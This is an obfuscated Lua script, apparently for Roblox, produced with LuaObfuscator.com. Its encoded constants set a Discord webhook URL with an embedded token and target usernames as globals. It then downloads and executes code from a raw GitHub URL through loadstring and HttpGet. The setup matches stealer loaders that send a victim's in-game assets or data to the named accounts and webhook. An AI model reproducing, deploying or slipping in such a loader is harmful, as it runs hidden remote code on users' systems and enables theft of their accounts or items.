--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==4) then function v25()local v31=(0 + 0) -0 ;local v32;local v33;local v34;local v35;local v36;local v37;while true do if (v31==(8 -5)) then if (v36==(0 -0)) then if (v35==(0 -0)) then return v37 * 0 ;else local v104=619 -(555 + (156 -92)) ;while true do if (v104==(931 -(857 + 74))) then v36=569 -(367 + 201) ;v34=927 -(214 + 713) ;break;end end end elseif (v36==2047) then return ((v35==0) and (v37 * ((1 + 0 + 0)/(0 + 0)))) or (v37 * NaN) ;end return v8(v37,v36-((7551 -5651) -(282 + (1547 -(802 + 150)))) ) * (v34 + (v35/((1639 -(1523 + 114))^(47 + 5)))) ;end if (v31==2) then v36=v21(v33,21,43 -12 );v37=((v21(v33,1097 -(68 + 997) )==(1271 -(226 + (2810 -1766)))) and  -((6 -2) -3)) or (118 -(32 + 62 + 23)) ;v31=3 + 0 ;end if (v31==1) then v34=(998 -(915 + 82)) + 0 ;v35=(v21(v33,1,977 -(892 + 65) ) * ((4 -2)^(58 -(73 -47)))) + v32 ;v31=3 -1 ;end if (v31==(350 -(87 + 263))) then v32=v24();v33=v24();v31=181 -(67 + 113) ;end end end v26=nil;function v26(v38)local v39;if  not v38 then v38=v24();if (v38==0) then return "";end end v39=v3(v16,v19,(v19 + v38) -(1 + 0) );v19=v19 + v38 ;local v40={};for v69=1 -0 , #v39 do v40[v69]=v2(v1(v3(v39,v69,v69)));end return v6(v40);end v18=5;end if (v18==6) then v29=nil;function v29()local v41=0;local v42;local v43;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v41==(2 + 1)) then local v93=0 -0 ;while true do if (v93~=0) then else v48=nil;v49=nil;v93=115 -(4 + 110) ;end if (v93~=(585 -(57 + 527))) then else v41=4;break;end end end if ((1429 -(41 + 1386))==v41) then local v94=103 -(17 + 86) ;while true do if (v94==(0 + 0)) then v46=nil;v47=nil;v94=1 -0 ;end if (v94==1) then v41=8 -5 ;break;end end end if (v41==1) then local v95=0;while true do if (v95~=(167 -(122 + 44))) then else v41=2;break;end if (v95==0) then v44=nil;v45=nil;v95=1 -0 ;end end end if ((0 -0)==v41) then local v96=0 + 0 ;while true do if (0~=v96) then else v42=0 + 0 ;v43=nil;v96=1 -0 ;end if (v96==(66 -(30 + 35))) then v41=1 + 0 ;break;end end end if (v41~=4) then else while true do if (v42==2) then local v101=1257 -(1043 + 214) ;while true do if (v101~=(0 -0)) then else v47=nil;v48=nil;v101=1;end if (v101==1) then v42=1215 -(323 + 889) ;break;end end end if (1==v42) then local v102=0 -0 ;while true do if (v102==1) then v42=582 -(361 + 219) ;break;end if (v102==(320 -(53 + 267))) then v45=nil;v46=nil;v102=1 + 0 ;end end end if (0==v42) then local v103=413 -(15 + 398) ;while true do if (v103==(983 -(18 + 964))) then v42=1;break;end if (v103~=0) then else v43=0;v44=nil;v103=3 -2 ;end end end if (v42~=(2 + 1)) then else v49=nil;while true do local v105=0 + 0 ;local v106;while true do if (v105~=(850 -(20 + 830))) then else v106=0 + 0 ;while true do if (v106~=(127 -(116 + 10))) then else if (v43==3) then local v173=0 + 0 ;local v174;local v175;while true do if (v173~=(738 -(542 + 196))) then else v174=0;v175=nil;v173=1 -0 ;end if (v173==1) then while true do if (v174~=(0 + 0)) then else v175=0 + 0 ;while true do if (v175==(0 + 0)) then local v185=0;while true do if (v185==0) then for v195=1,v24() do v45[v195-(2 -1) ]=v29();end return v47;end end end end break;end end break;end end end if (v43==1) then local v176=0 -0 ;local v177;local v178;while true do if (v176~=(1551 -(1126 + 425))) then else v177=0;v178=nil;v176=406 -(118 + 287) ;end if (1==v176) then while true do if (v177~=0) then else v178=0;while true do if (v178~=0) then else local v186=0 -0 ;while true do if (v186==(1121 -(118 + 1003))) then v47={v44,v45,nil,v46};v48=v24();v186=4 -3 ;end if (v186==(1 + 0)) then v178=978 -(553 + 424) ;break;end end end if (1~=v178) then else v49={};v43=2;break;end end break;end end break;end end end break;end if (v106==(0 -0)) then local v149=0 + 0 ;while true do if (v149==1) then v106=1 + 0 ;break;end if (v149==0) then if (v43==(2 + 0)) then local v181=0 + 0 ;local v182;while true do if (v181~=(0 + 0)) then else v182=0;while true do if (0==v182) then local v187=0;local v188;while true do if (v187==(0 -0)) then v188=0 -0 ;while true do if (1==v188) then v182=2 -1 ;break;end if (v188~=(0 + 0)) then else local v198=0 -0 ;while true do if (v198==0) then for v201=754 -(239 + 514) ,v48 do local v202=0 + 0 ;local v203;local v204;local v205;local v206;while true do if (v202==(1329 -(797 + 532))) then v203=0;v204=nil;v202=1 + 0 ;end if (v202~=(1 + 0)) then else v205=nil;v206=nil;v202=4 -2 ;end if (v202==(1204 -(373 + 829))) then while true do if (0==v203) then v204=0;v205=nil;v203=732 -(476 + 255) ;end if (v203==(1131 -(369 + 761))) then v206=nil;while true do if (v204~=(0 + 0)) then else local v224=0;local v225;while true do if (v224==(0 -0)) then v225=0;while true do if (v225==1) then v204=1;break;end if (v225==(0 -0)) then local v230=238 -(64 + 174) ;local v231;while true do if (v230==(0 + 0)) then v231=0 -0 ;while true do if (v231==1) then v225=1;break;end if (v231==0) then local v239=0;while true do if (v239==(337 -(144 + 192))) then v231=217 -(42 + 174) ;break;end if (v239==0) then v205=v22();v206=nil;v239=1;end end end end break;end end end end break;end end end if (v204==1) then if (v205==1) then v206=v22()~=(0 + 0) ;elseif (v205==2) then v206=v25();elseif (v205==(3 + 0)) then v206=v26();end v49[v201]=v206;break;end end break;end end break;end end end v47[3]=v22();v198=1 + 0 ;end if (v198==1) then v188=1505 -(363 + 1141) ;break;end end end end break;end end end if (v182==(1581 -(1183 + 397))) then for v190=2 -1 ,v24() do local v191=0 + 0 ;local v192;local v193;local v194;while true do if (v191==1) then v194=nil;while true do if (v192==1) then while true do if (v193==0) then v194=v22();if (v21(v194,1 + 0 ,1)==0) then local v207=1975 -(1913 + 62) ;local v208;local v209;local v210;local v211;while true do if (v207~=(1 + 0)) then else local v212=0;while true do if (0==v212) then local v214=0 -0 ;while true do if (v214==0) then v210=nil;v211=nil;v214=1;end if (v214==(1934 -(565 + 1368))) then v212=1;break;end end end if (v212~=1) then else v207=7 -5 ;break;end end end if (v207~=(1663 -(1477 + 184))) then else while true do if (v208==2) then local v215=0 -0 ;local v216;local v217;while true do if (1==v215) then while true do if (0==v216) then v217=0 + 0 ;while true do if (v217==(856 -(564 + 292))) then local v232=0 -0 ;local v233;while true do if ((0 -0)==v232) then v233=304 -(244 + 60) ;while true do if (v233==(1 + 0)) then v217=1;break;end if (v233==(476 -(41 + 435))) then local v241=1001 -(938 + 63) ;while true do if (v241~=1) then else v233=1 + 0 ;break;end if (v241==(1125 -(936 + 189))) then if (v21(v210,1 + 0 ,1614 -(1565 + 48) )~=(1 + 0)) then else v211[2]=v49[v211[2]];end if (v21(v210,1140 -(782 + 356) ,269 -(176 + 91) )==(2 -1)) then v211[4 -1 ]=v49[v211[1095 -(975 + 117) ]];end v241=1876 -(157 + 1718) ;end end end end break;end end end if (1==v217) then v208=3 + 0 ;break;end end break;end end break;end if (v215==(0 -0)) then v216=0 -0 ;v217=nil;v215=1019 -(697 + 321) ;end end end if (v208~=0) then else local v218=0 -0 ;local v219;local v220;while true do if ((0 -0)==v218) then v219=0 -0 ;v220=nil;v218=1;end if (v218~=1) then else while true do if (v219==(0 + 0)) then v220=0 -0 ;while true do if (v220==(0 -0)) then local v234=1227 -(322 + 905) ;while true do if (0==v234) then v209=v21(v194,613 -(602 + 9) ,3);v210=v21(v194,4,6);v234=1190 -(449 + 740) ;end if ((873 -(826 + 46))~=v234) then else v220=1;break;end end end if (v220~=(948 -(245 + 702))) then else v208=3 -2 ;break;end end break;end end break;end end end if ((1 + 2)==v208) then if (v21(v210,3,1901 -(260 + 1638) )~=(441 -(382 + 58))) then else v211[12 -8 ]=v49[v211[4 + 0 ]];end v44[v190]=v211;break;end if (v208~=(1 -0)) then else local v222=0 -0 ;local v223;while true do if ((1205 -(902 + 303))~=v222) then else v223=0;while true do if (v223~=0) then else local v229=0;while true do if (v229==1) then v223=1;break;end if (v229==0) then v211={v23(),v23(),nil,nil};if (v209==(1690 -(1121 + 569))) then local v235=214 -(22 + 192) ;local v236;local v237;local v238;while true do if (v235~=(683 -(483 + 200))) then else v236=1463 -(1404 + 59) ;v237=nil;v235=1;end if (v235==(2 -1)) then v238=nil;while true do if (v236==(0 -0)) then local v243=765 -(468 + 297) ;while true do if (v243~=1) then else v236=563 -(334 + 228) ;break;end if (v243~=(0 -0)) then else v237=0 -0 ;v238=nil;v243=1 -0 ;end end end if (v236==1) then while true do if (v237==(0 + 0)) then v238=0;while true do if (v238==0) then v211[3]=v23();v211[4]=v23();break;end end break;end end break;end end break;end end elseif (v209==(237 -(141 + 95))) then v211[3]=v24();elseif (v209==2) then v211[3 + 0 ]=v24() -((4 -2)^(38 -22)) ;elseif (v209~=3) then else local v244=0 + 0 ;local v245;while true do if (0==v244) then v245=0;while true do if (v245~=(0 -0)) then else v211[3]=v24() -(2^16) ;v211[3 + 1 ]=v23();break;end end break;end end end v229=1 + 0 ;end end end if (v223==1) then v208=2 -0 ;break;end end break;end end end end break;end if (v207==(0 + 0)) then local v213=0;while true do if (v213~=0) then else v208=0;v209=nil;v213=164 -(92 + 71) ;end if (v213==1) then v207=1 + 0 ;break;end end end end end break;end end break;end if (v192==0) then local v199=0;while true do if (v199~=(0 -0)) then else v193=765 -(574 + 191) ;v194=nil;v199=1;end if (v199~=1) then else v192=1;break;end end end end break;end if (0==v191) then local v197=0 + 0 ;while true do if (v197==(2 -1)) then v191=1;break;end if (v197==0) then v192=0 + 0 ;v193=nil;v197=850 -(254 + 595) ;end end end end end v43=3;break;end end break;end end end if (v43~=(126 -(55 + 71))) then else local v183=0 -0 ;local v184;while true do if (v183==(1790 -(573 + 1217))) then v184=0 -0 ;while true do if (v184~=0) then else local v189=0;while true do if ((0 + 0)==v189) then v44={};v45={};v189=1 -0 ;end if (v189==(940 -(714 + 225))) then v184=1;break;end end end if (v184==(2 -1)) then v46={};v43=1;break;end end break;end end end v149=1 -0 ;end end end end break;end end end break;end end break;end end end v30=nil;v18=7;end if (v18==3) then v24=nil;function v24()local v50=0 + 0 ;local v51;local v52;local v53;local v54;while true do if (v50==(1 -0)) then return (v54 * (16778022 -(118 + 688))) + (v53 * (65584 -(25 + 23))) + (v52 * (50 + (502 -296))) + v51 ;end if ((1886 -(927 + 959))==v50) then v51,v52,v53,v54=v1(v16,v19,v19 + (10 -(292 -(175 + 110))) );v19=v19 + ((833 -(11 + 86)) -((39 -23) + 716)) ;v50=1 -0 ;end end end v25=nil;v18=4;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v55)if (v1(v55,2)==79) then v20=v0(v3(v55,1,1));return "";else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v55,16));if v20 then local v107=0;local v108;while true do if (v107==1) then return v108;end if (v107==0) then v108=v5(v86,v20);v20=nil;v107=1;end end else return v86;end break;end end end end);v18=1;end if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==7) then function v30(v56,v57,v58)local v59=v56[1];local v60=v56[2];local v61=v56[3];return function(...)local v71=v59;local v72=v60;local v73=v61;local v74=v28;local v75=1;local v76= -1;local v77={};local v78={...};local v79=v12("#",...) -1 ;local v80={};local v81={};for v87=0,v79 do if (v87>=v73) then v77[v87-v73 ]=v78[v87 + 1 ];else v81[v87]=v78[v87 + 1 ];end end local v82=(v79-v73) + 1 ;local v83;local v84;while true do v83=v71[v75];v84=v83[1];if (v84<=5) then if (v84<=2) then if (v84<=0) then local v109=0;local v110;while true do if (v109==0) then v110=v83[2];v81[v110]=v81[v110](v13(v81,v110 + 1 ,v76));break;end end elseif (v84==1) then local v113;local v114,v115;local v116;local v117;v81[v83[2]][v83[3]]=v83[4];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v58[v83[3]];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v58[v83[3]];v75=v75 + 1 ;v83=v71[v75];v117=v83[2];v116=v81[v83[3]];v81[v117 + 1 ]=v116;v81[v117]=v116[v83[4]];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v83[3];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v83[3]~=0 ;v75=v75 + 1 ;v83=v71[v75];v117=v83[2];v114,v115=v74(v81[v117](v13(v81,v117 + 1 ,v83[3])));v76=(v115 + v117) -1 ;v113=0;for v147=v117,v76 do local v148=0;while true do if (v148==0) then v113=v113 + 1 ;v81[v147]=v114[v113];break;end end end v75=v75 + 1 ;v83=v71[v75];v117=v83[2];v81[v117]=v81[v117](v13(v81,v117 + 1 ,v76));v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]();v75=v75 + 1 ;v83=v71[v75];v75=v83[3];else local v129=0;local v130;local v131;local v132;local v133;while true do if (v129==2) then for v171=v130,v76 do local v172=0;while true do if (0==v172) then v133=v133 + 1 ;v81[v171]=v131[v133];break;end end end break;end if (v129==1) then v76=(v132 + v130) -1 ;v133=0;v129=2;end if (v129==0) then v130=v83[2];v131,v132=v74(v81[v130](v13(v81,v130 + 1 ,v83[3])));v129=1;end end end elseif (v84<=3) then v81[v83[2]]=v83[3];elseif (v84>4) then v75=v83[3];else v81[v83[2]]=v83[3]~=0 ;end elseif (v84<=8) then if (v84<=6) then if (v81[v83[2]]==v83[4]) then v75=v75 + 1 ;else v75=v83[3];end elseif (v84==7) then do return;end else v81[v83[2]][v83[3]]=v83[4];end elseif (v84<=10) then if (v84>9) then v81[v83[2]]();else v81[v83[2]]=v58[v83[3]];end elseif (v84>11) then local v141=0;local v142;local v143;while true do if (v141==1) then v81[v142 + 1 ]=v143;v81[v142]=v143[v83[4]];break;end if (v141==0) then v142=v83[2];v143=v81[v83[3]];v141=1;end end else local v144=0;while true do if (v144==2) then v81[v83[2]][v83[3]]=v83[4];v75=v75 + 1 ;v83=v71[v75];v144=3;end if (v144==3) then v81[v83[2]]=v83[3];v75=v75 + 1 ;v83=v71[v75];v144=4;end if (v144==0) then v81[v83[2]][v83[3]]=v83[4];v75=v75 + 1 ;v83=v71[v75];v144=1;end if (v144==4) then v75=v83[3];break;end if (v144==1) then v81[v83[2]]=v58[v83[3]];v75=v75 + 1 ;v83=v71[v75];v144=2;end end end v75=v75 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==2) then function v22()local v62=v1(v16,v19,v19);v19=v19 + 1 ;return v62;end v23=nil;function v23()local v63=0 + 0 ;local v64;local v65;while true do if (v63==(4 -3)) then return (v65 * (2052 -(503 + (2152 -(240 + 619))))) + v64 ;end if (v63==(0 -0)) then v64,v65=v1(v16,v19,v19 + 2 + 0 + 0 );v19=v19 + (1063 -(810 + (398 -147))) ;v63=3 -2 ;end end end v18=3;end if (v18==1) then v21=nil;function v21(v66,v67,v68)if v68 then local v90=0 + 0 ;local v91;while true do if (v90==(1744 -(1344 + 400))) then v91=(v66/((407 -(255 + 150))^(v67-1)))%((2 + 0)^(((v68-1) -(v67-(1 + 0))) + ((3 + 1) -3))) ;return v91-(v91%(3 -(1 + 1))) ;end end else local v92=2^(v67-(1740 -(404 + 1335))) ;return (((v66%(v92 + v92))>=v92) and (407 -((520 -(10 + 327)) + 223))) or (0 -0) ;end end v22=nil;v18=2;end end end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B037B3O0020682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O312O3332363537342O3938313330362O392F44647550695463375870355F79313042526C31434B426A3674433065526B4867724C564837727A6C44462D68652O7863753571484F4645324471555063683552306B6C5920030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C79706865725363726970747303083O00557365724E616D6503073O004967757874727703093O00557365724E616D653203083O00206967757874727700173O0012033O00013O0026063O000E000100020004053O000E0001001209000100033O00300100010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O001600010026063O0001000100010004053O00010001001209000100033O00300B0001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100012O00073O00017O00",v9(),...);end
